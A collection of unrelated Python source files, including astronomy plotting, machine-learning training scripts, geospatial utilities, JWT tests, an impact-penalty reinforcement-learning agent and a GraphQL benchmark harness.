plt.suptitle('Galaxy Depth maps (%s)' % band)
ps.savefig()
# dd = np.append(galdepthA.ravel(), galdepthB.ravel())
# dd = dd[np.isfinite(dd)]
# thresh = np.percentile(dd, 10)
# print('Depth threshold:', thresh)
thresh = 24.0
hh,ww = wcs.shape
ok,xx,yy = wcs.radec2pixelxy(TA.ra, TA.dec)
xx = np.clip((np.round(xx) - 1), 0, ww-1).astype(int)
yy = np.clip((np.round(yy) - 1), 0, hh-1).astype(int)
I = np.flatnonzero((galdepthA[yy,xx] > thresh) * (galdepthB[yy,xx] > thresh))
print(len(I), 'of', len(TA), 'sources in A are in good-depth regions')
TA.cut(I)
ok,xx,yy = wcs.radec2pixelxy(TB.ra, TB.dec)
xx = np.clip((np.round(xx) - 1), 0, ww-1).astype(int)
yy = np.clip((np.round(yy) - 1), 0, hh-1).astype(int)
I = np.flatnonzero((galdepthA[yy,xx] > thresh) * (galdepthB[yy,xx] > thresh))
print(len(I), 'of', len(TB), 'sources in B are in good-depth regions')
TB.cut(I)
ha = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
plt.clf()
plt.hist(np.maximum(psfdepthA.ravel(), 18), color='b', label=Atxt, **ha)
plt.hist(np.maximum(psfdepthB.ravel(), 18), color='r', label=Btxt, **hb)
plt.xlim(18,27)
plt.legend()
plt.title('PSF depth map values (g mag)')
ps.savefig()
plt.clf()
plt.hist(np.maximum(galdepthA.ravel(), 18), color='b', label=Atxt, **ha)
plt.hist(np.maximum(galdepthB.ravel(), 18), color='r', label=Btxt, **hb)
plt.xlim(18,27)
plt.legend()
plt.title('Galaxy depth map values (g mag)')
ps.savefig()
TA.mag_g = -2.5 * (np.log10(TA.flux_g) - 9)
TB.mag_g = -2.5 * (np.log10(TB.flux_g) - 9)
TA.psfdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TA.psfdepth_g)) - 9)
TB.psfdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TB.psfdepth_g)) - 9)
TA.galdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TA.galdepth_g)) - 9)
TB.galdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TB.galdepth_g)) - 9)
ha = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
ha2 = dict(range=(18,27), bins=50, histtype='step', alpha=0.5)
hb2 = dict(range=(18,27), bins=50, histtype='step', alpha=0.5)
plt.clf()
plt.hist(TA.mag_g, color='b', label=Atxt, **ha)
plt.hist(TA.mag_g, color='b', **ha2)
plt.hist(TB.mag_g, color='r', label=Btxt, **hb)
plt.hist(TB.mag_g, color='r', **hb2)
plt.xlim(18,27)
plt.legend()
plt.xlabel('All sources: g mag')
ps.savefig()
ha = dict(range=(23,25), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(23,25), bins=50, histtype='stepfilled', alpha=0.1)
plt.clf()
plt.hist(TA.psfdepth_mag_g, color='b', label=Atxt, **ha)
plt.hist(TB.psfdepth_mag_g, color='r', label=Btxt, **hb)
plt.xlim(23,25)
plt.legend()
plt.title('PSF depth for sources (g mag)')
ps.savefig()
plt.clf()
plt.hist(TA.galdepth_mag_g, color='b', label=Atxt, **ha)
plt.hist(TB.galdepth_mag_g, color='r', label=Btxt, **hb)
plt.xlim(23,25)
plt.legend()
plt.title('Gal depth for sources (g mag)')
ps.savefig()
ha = dict(range=((ramin,ramax),(decmin,decmax)), doclf=False,
docolorbar=False, imshowargs=dict(vmin=0, vmax=14))
plt.clf()
plt.subplot(1,2,1)
plothist(TA.ra, TA.dec, 200, **ha)
plt.title(Atxt)
plt.subplot(1,2,2)
plothist(TB.ra, TB.dec, 200, **ha)
plt.title(Btxt)
plt.suptitle('All sources')
ps.savefig()
I,J,d = match_radec(TA.ra, TA.dec, TB.ra, TB.dec, 1./3600.)
unmatchedA = np.ones(len(TA), bool)
unmatchedB = np.ones(len(TB), bool)
unmatchedA[I] = False
unmatchedB[J] = False
ha = dict(range=((ramin,ramax),(decmin,decmax)), doclf=False,
docolorbar=False, imshowargs=dict(vmin=0, vmax=5))
plt.clf()
plt.subplot(1,2,1)
plothist(TA.ra[unmatchedA], TA.dec[unmatchedA], 200, **ha)
plt.title(Atxt)
plt.subplot(1,2,2)
plothist(TB.ra[unmatchedB], TB.dec[unmatchedB], 200, **ha)
plt.title(Btxt)
plt.suptitle('Un-matched sources')
ps.savefig()
|
40627
|
import time
import pytest
@pytest.mark.parametrize("index", range(7))
def test_cat(index):
"""Perform several tests with varying execution times."""
time.sleep(0.2 + (index * 0.1))
assert True
|
40661
|
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
import lightgbm as lgb
import xgboost as xgb
# read dataset
df_train = pd.read_csv('train.csv')
df_test = pd.read_csv('test.csv')
# gini function
def gini(actual, pred, cmpcol = 0, sortcol = 1):
assert( len(actual) == len(pred) )
all = np.asarray(np.c_[ actual, pred, np.arange(len(actual)) ], dtype=np.float)
all = all[ np.lexsort((all[:,2], -1*all[:,1])) ]
totalLosses = all[:,0].sum()
giniSum = all[:,0].cumsum().sum() / totalLosses
giniSum -= (len(actual) + 1) / 2.
return giniSum / len(actual)
def gini_normalized(a, p):
return gini(a, p) / gini(a, a)
def gini_xgb(preds, dtrain):
labels = dtrain.get_label()
gini_score = gini_normalized(labels, preds)
return 'gini', gini_score
def gini_lgb(preds, dtrain):
labels = dtrain.get_label()
gini_score = gini_normalized(labels, preds)
return 'gini', gini_score, True
# define fold number
kfold = 5
skf = StratifiedKFold(n_splits=kfold, random_state=42)
sub = pd.DataFrame()
sub['id'] = test_id
sub['target'] = np.zeros_like(test_id)
params_xgd = {
'min_child_weight': 10.0,
'objective': 'binary:logistic',
'max_depth': 7,
'max_delta_step': 1.8,
'colsample_bytree': 0.4,
'subsample': 0.8,
'eta': 0.005,
'gamma': 0.65,
'num_boost_round' : 700
}
params_lgb = {
'max_depth': 7,
'learning_rate': 0.005,
'objective': 'binary'
}
for i, (train_index, test_index) in enumerate(skf.split(X, y)):
print('[Fold %d/%d]' % (i + 1, kfold))
X_train, X_valid = X[train_index], X[test_index]
y_train, y_valid = y[train_index], y[test_index]
d_train = lgb.Dataset(X_train, y_train)
d_valid = lgb.Dataset(X_valid, y_valid)
watchlist = [d_train, d_valid]
model_lgb = lgb.train(params_lgb, d_train, 1600, watchlist, early_stopping_rounds = 70, feval = gini_lgb, verbose_eval = 100)
d_train = xgb.DMatrix(X_train, y_train)
d_valid = xgb.DMatrix(X_valid, y_valid)
d_test = xgb.DMatrix(test.values)
watchlist = [(d_train, 'train'), (d_valid, 'valid')]
model_xgb = xgb.train(params_xgd, d_train, 1600, watchlist, early_stopping_rounds = 70, feval = gini_xgb, maximize = True, verbose_eval = 100)
print('[Fold %d/%d Prediciton:]' % (i + 1, kfold))
pred_xgb = model_xgb.predict(d_test, ntree_limit = mdl.best_ntree_limit)
pred_lgb = model_lgb.predict(test.values)
# 0.7 from xgb, 0.3 from lgb. You can play around here
sub['target'] += (pred_xgb * 0.7 + pred_lgb * 0.3) / kfold
|
40665
|
import os
import re
import warnings
from uuid import uuid4, UUID
import shapely.geometry
import geopandas as gpd
import pandas as pd
import numpy as np
from geojson import LineString, Point, Polygon, Feature, FeatureCollection, MultiPolygon
try:
import simplejson as json
except ImportError:
import json
from .config import get_settings
from ..static import UriType
def _abs_path(path, mkdir=True):
"""Gets the absolute path for a file to be within the Quest directory,
and will create a directory of that filename.
Args:
path (string): A string that is a filename.
mkdir (bool): A boolean if the user wants to create the directory.
Returns:
A string of an absolute path with a file from somewhere with in the Quest directory.
"""
if not os.path.isabs(path):
path = os.path.join(get_quest_dir(), path)
if mkdir:
os.makedirs(path, exist_ok=True)
return path
def bbox2poly(x1, y1, x2, y2, reverse_order=False, as_geojson=False, as_shapely=False):
"""Converts a bounding box to a polygon.
Args:
x1 (int): An int for the first x coordinate.
y1 (int): An int for the first y coordinate.
x2 (int): An int for the second x coordinate.
y2 (int): An int for the second y coordinate.
reverse_order (bool): A boolean to switch the order of the x and y coordinates.
as_geojson (bool): A bool to convert the polygon to a geojson object.
as_shapely (bool): A bool to convert the polygon to a shapely object.
Returns:
If the bool is false for both geojson and shapely then just a list is returned.
If the bool is true for both geojson and shapely then a shapley object is returned.
If the bool is true for just the geojson, then a geojson object is returned.
If the bool is true for just the shapely, then a shapely object is returned.
"""
if reverse_order:
x1, y1 = y1, x1
x2, y2 = y2, x2
xmin, xmax = [float(x1), float(x2)]
ymin, ymax = [float(y1), float(y2)]
poly = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly.append(poly[0])
if not (as_geojson or as_shapely):
return poly
if as_geojson:
polygon = Polygon
multi_polygon = MultiPolygon
if as_shapely:
polygon = shapely.geometry.Polygon
multi_polygon = shapely.geometry.MultiPolygon
xmin2 = xmax2 = None
if xmin < -180:
xmin2 = 360 + xmin
xmin = -180
if xmax > 180:
xmax2 = xmax - 360
xmax = 180
if xmin2 is None and xmax2 is None:
return polygon(poly)
# else bbox spans 180 longitude so create multipolygon
poly1 = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly1.append(poly1[0])
xmin = xmin2 or -180
xmax = xmax2 or 180
poly2 = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly2.append(poly2[0])
return multi_polygon(polygons=[polygon(poly1), polygon(poly2)])
def classify_uris(uris, grouped=True, as_dataframe=True, require_same_type=False, exclude=None, raise_if_empty=True):
"""Converts a list of uris into a pandas dataframe.
Notes:
Classified by resource type.
Args:
uris (list or string): List of Quest uris to classify into the following types: 'collections', 'services',
'publishers', or 'datasets'.
grouped (bool): If True returns
Pandas GroupBy object (see: https://pandas.pydata.org/pandas-docs/stable/groupby.html)
as_dataframe (bool): If True returns a Pandas DataFrame
require_same_type (bool): If True raises a `ValueError` if uris of more than one type are passed in.
exclude (list or string): List of uri types to not allow. If a uri of an excluded type is passed in
then a `ValueError` will be raised.
Returns:
A pandas dataframe.
"""
uris = listify(uris)
df = pd.DataFrame(uris, columns=['uri'])
df['type'] = UriType.COLLECTION
uuid_idx = df['uri'].apply(is_uuid)
service_idx = df['uri'].str.startswith('svc://')
publish_idx = df['uri'].str.startswith('pub://')
dataset_idx = uuid_idx & df['uri'].str.startswith('d')
df['type'][service_idx] = UriType.SERVICE
df['type'][publish_idx] = UriType.PUBLISHER
df['type'][dataset_idx] = UriType.DATASET
df.set_index('uri', drop=False, inplace=True)
grouped_df = df.groupby('type')
if raise_if_empty:
if df.empty:
raise ValueError('At least one uri must be specified.')
if exclude is not None:
for uri_type in exclude:
if uri_type in grouped_df.groups:
raise ValueError('Uris for {0} are not allowed.'.format(uri_type))
if require_same_type and len(grouped_df.groups.keys()) > 1:
raise ValueError('All uris must be of the same type')
if not as_dataframe:
groups = {k: list(v) for k, v in grouped_df.groups.items()}
return groups
if grouped:
return grouped_df
return df
def construct_service_uri(provider, service, catalog_id=None):
"""Builds a uri from the given parameters.
Args:
provider (string): A string of the provider.
service (string): A string of the service.
catalog_id (string): A string of the catalog_id.
Returns:
If there is no catalog_id then the uri will just be the provider
and service, else the catalog_id will be appended to the end of the
uri.
"""
uri = 'svc://{}:{}'.format(provider, service)
if catalog_id is not None:
uri = '{}/{}'.format(uri, catalog_id)
return uri
def convert_nodata_to_nans(xarr):
"""
Args:
xarr:
Returns:
"""
nodata_attr = [k for k in xarr.attrs.keys() if k.lower().startswith('nodata')][0]
nodata = xarr.attrs[nodata_attr]
if nodata:
if str(xarr.dtype).startswith('int') or str(xarr.dtype).startswith('uint'):
xarr.values = xarr.values.astype(np.float32)
xarr.values[xarr.values == nodata] = np.nan
return xarr
def get_cache_dir(service=None):
"""Gets the absolute path of the cached directory.
Args:
service (string): A string of the specific service the user wants.
Returns:
A string of the path to the cached directory.
"""
settings = get_settings()
path = _abs_path(settings['CACHE_DIR'])
if service is not None:
path = os.path.join(path, service)
return path
def get_projects_dir():
"""Gets the absolute path of the projects directory within Quest.
Returns:
An absolute path leading to the project directory from within Quest.
"""
settings = get_settings()
return _abs_path(settings['PROJECTS_DIR'], mkdir=False)
def get_quest_dir():
"""Gets the absolute path of the Quest directory.
Returns:
An absolute path of the Quest directory.
"""
settings = get_settings()
return settings['BASE_DIR']
def is_remote_uri(path):
"""Checks if the incoming path is a remote uri.
Args:
path (string): A string that is either a path or uri.
Returns:
If the path is a remote destination then true, false otherwise.
"""
return bool(re.search('^https?\://', path))
def is_uuid(uuid):
"""Check if string is a uuid4.
Notes:
source: https://gist.github.com/ShawnMilo/7777304
Args:
uuid (int): A universal unique identifier.
Returns:
If the uuid is version 4 then true, else false otherwise.
"""
try:
val = UUID(uuid, version=4)
except ValueError:
# If it's a value error, then the string is not a valid UUID.
return False
# If the uuid_string is a valid hex code, but an invalid uuid4,
# the UUID.__init__ will convert it to a valid uuid4.
# This is bad for validation purposes.
return val.hex == uuid
def listify(liststr, delimiter=','):
"""Converts a string into a list.
Args:
liststr (string): A string of words or etc.
delimiter (char): A char that will be used as the delimiter identifier.
Returns:
If a string then a string will be a list.
If nothing is sent in, then none will be returned.
If a list, then a list will be returned.
If not a list or string, then the item will be returned.
"""
if liststr is None:
return None
if isinstance(liststr, (tuple, list, set, dict)):
return liststr
elif isinstance(liststr, str):
return [s.strip() for s in liststr.split(delimiter)]
else:
return [liststr]
def parse_service_uri(uri):
"""Parses a service uri into separate provider, service, and catalog_id strings.
Examples:
usgs-nwis:dv/0800345522
gebco-bathymetry
usgs-ned:1-arc-second
Args:
uri (string): A string that is a uri.
Returns:
Three strings are returned from the parsed uri.
"""
svc, catalog_id = (uri.split('://')[-1].split('/', 1) + [None])[:2]
provider, service = (svc.split(':') + [None])[:2]
return provider, service, catalog_id
def setattr_on_dataframe(df, attr, value, warnings_filter='ignore'):
with warnings.catch_warnings():
warnings.simplefilter(warnings_filter)
setattr(df, attr, value)
def to_geodataframe(feature_collection):
"""Converts a dictionary to a GeoPandas Dataframe object.
Args:
feature_collection (dictionary): A dictionary that contains features.
Returns:
A GeoPandas Dataframe.
"""
features = {}
for feature in feature_collection['features']:
data = feature['properties']
data.update({
'service_id': feature['id'],
'geometry': shapely.geometry.shape(feature['geometry'])
})
features[feature['id']] = data
return gpd.GeoDataFrame.from_dict(features, orient='index')
def to_geojson(df):
"""Converts a dataframe to a geojson object.
Args:
df (dataframe): A dataframe that is being converted to a geojson object.
Returns:
A geojson object is what is being returned.
"""
_func = {
'LineString': LineString,
'Point': Point,
'Polygon': Polygon,
}
features = []
if not df.empty:
# TODO what is this code doing and is it now obsolete with the new DB?
idx = df.columns.str.startswith('_')
r = {field: field[1:] for field in df.columns[idx]}
for uid, row in df.iterrows():
metadata = json.loads(row[~idx].dropna().to_json())
row = row[idx].rename(index=r)
# create geojson geometry
geometry = None
if row['geom_type'] is not None:
coords = row['geom_coords']
if not isinstance(coords, (list, tuple)):
coords = json.loads(coords)
geometry = _func[row['geom_type']](coords)
del row['geom_type']
del row['geom_coords']
# split fields into properties and metadata
properties = json.loads(row.dropna().to_json())
properties.update({'metadata': metadata})
features.append(Feature(geometry=geometry, properties=properties,
id=uid))
return FeatureCollection(features)
def to_json_default_handler(obj):
"""Gets an attribute from the object.
Notes:
This method is confusing and the name is confusing.
Args:
obj (object): An object of some nature.
Returns:
If the object has an attribute isoformat, then return it.
"""
if hasattr(obj, 'isoformat'):
return obj.isoformat()
def uuid(resource_type):
"""Generate a new uuid.
Notes:
First character of uuid is replaced with 'd' for resource_type dataset.
Args:
resource_type (string): A string that is a type of resource i.e. 'dataset'.
Returns:
A new uuid from the resource type.
"""
uuid = uuid4().hex
if resource_type == 'dataset':
uuid = 'd' + uuid[1:]
return uuid
|
40702
|
import sys
import yahooscraper as ys
from datetime import datetime, date
from urllib.parse import urljoin
# Environment variables
USERNAME_ENV = 'YAHOO_USERNAME'
PASSWORD_ENV = '<PASSWORD>'
# Command-line args
REQUIRED_ARGS = [
'<league_id>',
'<team_id>'
]
OPTIONAL_ARGS = []
# Error messages
LOGIN_ERROR_MSG = 'Failed to log in'
def usage():
"""
Print usage and exit
"""
msg_lines = [
' '.join((
'Usage: python',
sys.argv[0],
' '.join(REQUIRED_ARGS),
' '.join(OPTIONAL_ARGS))),
'Environment variables %s and %s must also be set' % (
USERNAME_ENV,
PASSWORD_ENV)]
sys.exit('\n\n'.join(msg_lines))
def required_num_args():
min_args = len(REQUIRED_ARGS) + 1
max_args = min_args + len(OPTIONAL_ARGS)
return range(min_args, max_args + 1)
def parsed_and_bounded_arg(i, max, min, parse):
"""
Returns parsed and bounded arg from argv.
The `parse` parameter is a single-argument function which is called with
the arg. The output of this function is only returned if it is between
min and max.
If parse fails or arg is not within bounds, None is returned.
"""
if len(sys.argv) > i:
try:
parsed_arg = parse(sys.argv[i])
return parsed_arg if min <= parsed_arg <= max else None
except:
return None
else:
return None
def date_from_argv(i, max, min=date.today()):
return parsed_and_bounded_arg(
i, max, min,
lambda arg: datetime.strptime(arg, '%Y-%m-%d').date())
def int_from_argv(i, max, min=1):
return parsed_and_bounded_arg(i, max, min, lambda arg: int(arg))
def output_team_info(session, league_id, team_id):
"""
Output team name and league
"""
response = session.get(ys.fantasy.team.url('nba', league_id, team_id))
league = ys.fantasy.team.league(response.text)
team = ys.fantasy.team.team(response.text)
print('%s - %s:\n' % (league, team))
|
40706
|
import FWCore.ParameterSet.Config as cms
from RecoJets.JetProducers.PFClusterJetParameters_cfi import *
from RecoJets.JetProducers.AnomalousCellParameters_cfi import *
ak4PFClusterJets = cms.EDProducer(
"FastjetJetProducer",
PFClusterJetParameters,
AnomalousCellParameters,
jetAlgorithm = cms.string("AntiKt"),
rParam = cms.double(0.4)
)
|
40753
|
VERSION = (0, 7, 0)
__version__ = ".".join(map(str, VERSION))
default_app_config = "user_messages.apps.UserMessagesConfig"
|
40754
|
from setuptools import setup
setup(
name='optool',
version='1.9.4',
py_modules=['optool'],
install_requires=[
'numpy','matplotlib'
]
)
|
40770
|
import json
import json
import hashlib
from pydantic import BaseModel, validator
from typing import List, Optional
from speckle.base.resource import ResourceBaseSchema
from speckle.resources.objects import SpeckleObject
from speckle.schemas import Interval
NAME = 'line'
class Schema(SpeckleObject):
type: Optional[str] = "Line"
name: Optional[str] = "SpeckleLine"
Value: List[float] = []
domain: Optional[Interval] = Interval()
class Config:
case_sensitive = False
|
40779
|
import os
from oic.utils.jwt import JWT
from oic.utils.keyio import build_keyjar
from oic.utils.keyio import keybundle_from_local_file
__author__ = "roland"
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "data/keys"))
keys = [
{"type": "RSA", "key": os.path.join(BASE_PATH, "cert.key"), "use": ["enc", "sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["enc"]},
]
jwks, keyjar, kidd = build_keyjar(keys)
issuer = "https://fedop.example.org"
def _eq(l1, l2):
return set(l1) == set(l2)
def test_jwt_pack():
_jwt = JWT(keyjar, lifetime=3600, iss=issuer).pack()
assert _jwt
assert len(_jwt.split(".")) == 3
def test_jwt_pack_and_unpack():
srv = JWT(keyjar, iss=issuer)
_jwt = srv.pack(sub="sub")
info = srv.unpack(_jwt)
assert _eq(info.keys(), ["jti", "iat", "exp", "iss", "sub", "kid"])
class TestJWT(object):
"""Tests for JWT."""
def test_unpack_verify_key(self):
srv = JWT(keyjar, iss=issuer)
_jwt = srv.pack(sub="sub")
# Remove the signing key from keyjar
keyjar.remove_key("", "RSA", "")
# And add it back as verify
kb = keybundle_from_local_file(
os.path.join(BASE_PATH, "cert.key"), "RSA", ["ver"]
)
# keybundle_from_local_file doesn'assign kid, so assign manually
kb._keys[0].kid = kidd["sig"]["RSA"]
keyjar.add_kb("", kb)
info = srv.unpack(_jwt)
assert info["sub"] == "sub"
|
40808
|
from ai_safety_gridworlds.environments.shared import safety_game
from collections import defaultdict
import experiments.environment_helper as environment_helper
import numpy as np
class ModelFreeAUPAgent:
name = "Model-free AUP"
pen_epsilon, AUP_epsilon = .2, .9 # chance of choosing greedy action in training
default = {'lambd': 1./1.501, 'discount': .996, 'rpenalties': 30, 'episodes': 6000}
def __init__(self, env, lambd=default['lambd'], state_attainable=False, num_rewards=default['rpenalties'],
discount=default['discount'], episodes=default['episodes'], trials=50, use_scale=False):
"""Trains using the simulator and e-greedy exploration to determine a greedy policy.
:param env: Simulator.
:param lambd: Impact tuning parameter.
:param state_attainable: True - generate state indicator rewards; false - random rewards.
:param num_rewards: Size of the attainable set, |\mathcal{R}|.
:param discount:
:param episodes:
:param trials:
"""
self.actions = range(env.action_spec().maximum + 1)
self.probs = [[1.0 / (len(self.actions) - 1) if i != k else 0 for i in self.actions] for k in self.actions]
self.discount = discount
self.episodes = episodes
self.trials = trials
self.lambd = lambd
self.state_attainable = state_attainable
self.use_scale = use_scale
if state_attainable:
self.name = 'Relative reachability'
self.attainable_set = environment_helper.derive_possible_rewards(env)
else:
self.attainable_set = [defaultdict(np.random.random) for _ in range(num_rewards)]
if len(self.attainable_set) == 0:
self.name = 'Standard' # no penalty applied!
self.train(env)
def train(self, env):
self.performance = np.zeros((self.trials, self.episodes / 10))
# 0: high-impact, incomplete; 1: high-impact, complete; 2: low-impact, incomplete; 3: low-impact, complete
self.counts = np.zeros(4)
for trial in range(self.trials):
self.attainable_Q = defaultdict(lambda: np.zeros((len(self.attainable_set), len(self.actions))))
self.AUP_Q = defaultdict(lambda: np.zeros(len(self.actions)))
if not self.state_attainable:
self.attainable_set = [defaultdict(np.random.random) for _ in range(len(self.attainable_set))]
self.epsilon = self.pen_epsilon
for episode in range(self.episodes):
if episode > 2.0 / 3 * self.episodes: # begin greedy exploration
self.epsilon = self.AUP_epsilon
time_step = env.reset()
while not time_step.last():
last_board = str(time_step.observation['board'])
action = self.behavior_action(last_board)
time_step = env.step(action)
self.update_greedy(last_board, action, time_step)
if episode % 10 == 0:
_, actions, self.performance[trial][episode / 10], _ = environment_helper.run_episode(self, env)
self.counts[int(self.performance[trial, -1]) + 2] += 1 # -2 goes to idx 0
env.reset()
def act(self, obs):
return self.AUP_Q[str(obs['board'])].argmax()
def behavior_action(self, board):
"""Returns the e-greedy action for the state board string."""
greedy = self.AUP_Q[board].argmax()
if np.random.random() < self.epsilon or len(self.actions) == 1:
return greedy
else: # choose anything else
return np.random.choice(self.actions, p=self.probs[greedy])
def get_penalty(self, board, action):
if len(self.attainable_set) == 0: return 0
action_attainable = self.attainable_Q[board][:, action]
null_attainable = self.attainable_Q[board][:, safety_game.Actions.NOTHING]
diff = action_attainable - null_attainable
# Scaling number or vector (per-AU)
if self.use_scale:
scale = sum(abs(null_attainable))
if scale == 0:
scale = 1
penalty = sum(abs(diff) / scale)
else:
scale = np.copy(null_attainable)
scale[scale == 0] = 1 # avoid division by zero
penalty = np.average(np.divide(abs(diff), scale))
# Scaled difference between taking action and doing nothing
return self.lambd * penalty # ImpactUnit is 0!
def update_greedy(self, last_board, action, time_step):
"""Perform TD update on observed reward."""
learning_rate = 1
new_board = str(time_step.observation['board'])
def calculate_update(attainable_idx=None):
"""Do the update for the main function (or the attainable function at the given index)."""
if attainable_idx is not None:
reward = self.attainable_set[attainable_idx](new_board) if self.state_attainable \
else self.attainable_set[attainable_idx][new_board]
new_Q, old_Q = self.attainable_Q[new_board][attainable_idx].max(), \
self.attainable_Q[last_board][attainable_idx, action]
else:
reward = time_step.reward - self.get_penalty(last_board, action)
new_Q, old_Q = self.AUP_Q[new_board].max(), self.AUP_Q[last_board][action]
return learning_rate * (reward + self.discount * new_Q - old_Q)
# Learn the attainable reward functions
for attainable_idx in range(len(self.attainable_set)):
self.attainable_Q[last_board][attainable_idx, action] += calculate_update(attainable_idx)
if self.state_attainable:
self.attainable_Q[last_board][:, action] = np.clip(self.attainable_Q[last_board][:, action], 0, 1)
self.AUP_Q[last_board][action] += calculate_update()
|
40809
|
import tensorflow as tf
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Conv2D, BatchNormalization, ReLU, GlobalAveragePooling2D, Dropout
class ASPP(Model):
def __init__(self, filters, dilation_rates=[3, 6, 9]):
super().__init__()
self.aspp1 = ASPPConv(filters, 1, 1)
self.aspp2 = ASPPConv(filters, 3, dilation_rates[0])
self.aspp3 = ASPPConv(filters, 3, dilation_rates[1])
self.aspp4 = ASPPConv(filters, 3, dilation_rates[2])
self.pool = ASPPPooling(filters)
self.project = Sequential([
Conv2D(filters, 1, use_bias=False),
BatchNormalization(momentum=0.1, epsilon=1e-5),
ReLU(),
Dropout(0.1)
])
def call(self, x, training=None):
x = tf.concat([
self.aspp1(x, training=training),
self.aspp2(x, training=training),
self.aspp3(x, training=training),
self.aspp4(x, training=training),
self.pool(x, training=training)
], axis=-1)
x = self.project(x, training=training)
return x
class ASPPConv(Model):
def __init__(self, filters, kernel_size, dilation_rate):
super().__init__()
self.conv = Conv2D(filters, kernel_size, padding='SAME', dilation_rate=dilation_rate, use_bias=False)
self.bn = BatchNormalization(momentum=0.1, epsilon=1e-5)
self.relu = ReLU()
def call(self, x, training=None):
x = self.conv(x, training=training)
x = self.bn(x, training=training)
x = self.relu(x, training=training)
return x
class ASPPPooling(Model):
def __init__(self, filters):
super().__init__()
self.pool = GlobalAveragePooling2D()
self.conv = Conv2D(filters, 1, use_bias=False)
self.bn = BatchNormalization(momentum=0.1, epsilon=1e-5)
self.relu = ReLU()
def call(self, x, training=None):
h, w = tf.shape(x)[1], tf.shape(x)[2]
x = self.pool(x, training=training)
x = x[:, None, None, :]
x = self.conv(x, training=training)
x = self.bn(x, training=training)
x = self.relu(x, training=training)
x = tf.image.resize(x, (h, w), 'nearest')
return x
|
40812
|
from sportsdb_setup import HGETestSetup, HGETestSetupArgs
from run_hge import HGE
import graphql
import multiprocessing
import json
import os
import docker
import ruamel.yaml as yaml
import cpuinfo
import subprocess
import threading
import time
import datetime
from colorama import Fore, Style
from plot import run_dash_server
import webbrowser
import pathlib
from urllib.parse import urlparse, urlunparse
import boto3
fileLoc = os.path.dirname(os.path.abspath(__file__))
def uri_path_join(uri, *paths):
p = urlparse(uri)
new_path = os.path.join(p.path, *paths)
return urlunparse(p._replace(path=new_path))
class HGEWrkBench(HGETestSetup):
wrk_docker_image = 'hasura/wrk:v0.3'
# We'll bind mount the lua script dir to this directory within the wrk container:
lua_dir = '/tmp/bench_scripts'
rps_steps = [10, 20, 50, 100, 200, 500, 1000, 2000, 5000]
def __init__(
self, pg_url, remote_pg_url, pg_docker_image, hge_url=None,
remote_hge_url=None, hge_docker_image=None,
hge_args=[], skip_stack_build=False,
graphql_queries_file='queries.graphql', connections=50,
duration=300, results_hge_url = None, results_hge_admin_secret = None
):
self.load_queries(graphql_queries_file)
super().__init__(
pg_url = pg_url,
remote_pg_url = remote_pg_url,
pg_docker_image = pg_docker_image,
hge_url = hge_url,
remote_hge_url = remote_hge_url,
hge_docker_image = hge_docker_image,
hge_args = hge_args,
skip_stack_build = skip_stack_build
)
self.connections = connections
self.duration = duration
self.results_hge_url = results_hge_url
self.results_hge_admin_secret = results_hge_admin_secret
self.extract_cpu_info()
# NOTE: we generally want to do this just once; otherwise if we happen
# to be editing the tree while this script is running the shasum will
# keep changing:
self.server_shasum = self.get_server_shasum()
def load_queries(self, graphql_queries_file):
self.graphql_queries_file = graphql_queries_file
with open(self.graphql_queries_file) as f:
queries = f.read()
self.query_names = []
self.queries = []
for oper in graphql.parse(queries).definitions:
self.query_names.append(oper.name.value)
self.queries.append(oper)
def get_wrk2_params(self):
cpu_count = multiprocessing.cpu_count()
return {
'threads': cpu_count,
'connections': self.connections,
'duration': self.duration
}
def get_current_user(self):
return '{}:{}'.format(os.geteuid(), os.getegid())
def wrk2_test(self, query, rps):
def upload_files(files):
if self.upload_root_uri:
p = urlparse(self.upload_root_uri)
if p.scheme == 's3':
bucket = p.netloc
key = p.path.lstrip('/')
s3_client = boto3.client('s3')
for (f, f_key) in files:
s3_client.upload_file(f, bucket, os.path.join(key, f_key))
query_str = graphql.print_ast(query)
params = self.get_wrk2_params()
print(Fore.GREEN + "Running benchmark wrk2 for at {} req/s (duration: {}) for query\n".format(rps, params['duration']), query_str + Style.RESET_ALL)
bench_script = os.path.join(self.lua_dir, 'bench-wrk2.lua')
graphql_url = self.hge.url + '/v1/graphql'
timestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
results_dir = self.results_root_dir
tests_path = [str(rps), timestamp]
results_dir = os.path.join(results_dir, *tests_path)
os.makedirs(results_dir, exist_ok=True)
wrk2_command = [
'wrk2',
'-R', str(rps),
'-t', str(params['threads']),
'-c', str(params['connections']),
'-d', str(params['duration']),
'--latency',
'-s', bench_script,
graphql_url,
query_str,
results_dir
]
volumes = self.get_scripts_vol()
volumes[results_dir] = {
'bind': results_dir,
'mode': 'rw'
}
self.docker_client = docker.from_env()
result = self.docker_client.containers.run(
self.wrk_docker_image,
detach = False,
stdout = True,
stderr = False,
command = wrk2_command,
network_mode = 'host',
environment = self.get_lua_env(),
volumes = volumes,
remove = True,
user = self.get_current_user()
).decode('ascii')
histogram_file = os.path.join(results_dir, 'latencies.hgrm')
histogram = self.get_latency_histogram(result, histogram_file)
summary_file = os.path.join(results_dir, 'summary.json')
with open(summary_file) as f:
summary = json.load(f)
latencies_file = os.path.join(results_dir, 'latencies')
def extract_data(v):
return v['data'] if isinstance(v, dict) and 'data' in v else v
tests_info = { k:extract_data(v) for (k, v) in self.gen_test_info(query, rps).items() }
tests_setup_file = os.path.join(results_dir, 'test_setup.json')
with open(tests_setup_file, 'w') as f:
